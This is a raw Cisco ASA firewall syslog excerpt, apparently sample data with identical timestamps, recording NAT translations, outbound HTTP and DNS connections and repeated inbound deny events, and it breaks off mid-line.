-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:100.66.128.3/80 (100.66.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:100.66.1.107/53 (100.66.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:100.66.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:100.66.98.44/8272
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:100.66.198.40/80 (100.66.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:100.66.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:100.66.192.44/80 (100.66.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:100.66.98.44/8267 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:100.66.98.44/8277
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:100.66.19.254/80 (100.66.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:100.66.98.44/8272 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:100.66.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:100.66.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:100.66.98.44/8278
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:100.66.115.46/80 (100.66.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:100.66.98.44/8279
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1190
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:100.66.14.30/53 (100.66.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:100.66.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:100.66.252.210/53 (100.66.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:100.66.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:100.66.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:100.66.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:100.66.98.44/8283
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:100.66.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:100.66.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:100.66.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:100.66.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:100.66.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:100.66.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:100.66.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:100.66.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:100.66.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:100.66.100.107/53 (100.66.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:100.66.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:100.66.104.8/53 (100.66.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:100.66.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:100.66.98.44/8293
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:100.66.123.191/80 (100.66.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:100.66.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:100.66.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:100.66.98.44/8294
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:100.66.198.25/80 (100.66.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:100.66.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:100.66.98.44/8276 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:100.66.162.30/53 (100.66.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:100.66.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:100.66.48.186/53 (100.66.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:100.66.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:100.66.98.44/8295
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:100.66.254.94/53 (100.66.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:100.66.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:100.66.98.44/8296
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:100.66.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:100.66.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:100.66.98.165/80 
to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:100.66.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:100.66.179.9/53 (100.66.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:100.66.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:100.66.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:100.66.247.99/80 (100.66.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304 -Oct 10 
2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:100.66.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:100.66.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:100.66.98.44/8283 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: 
Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from 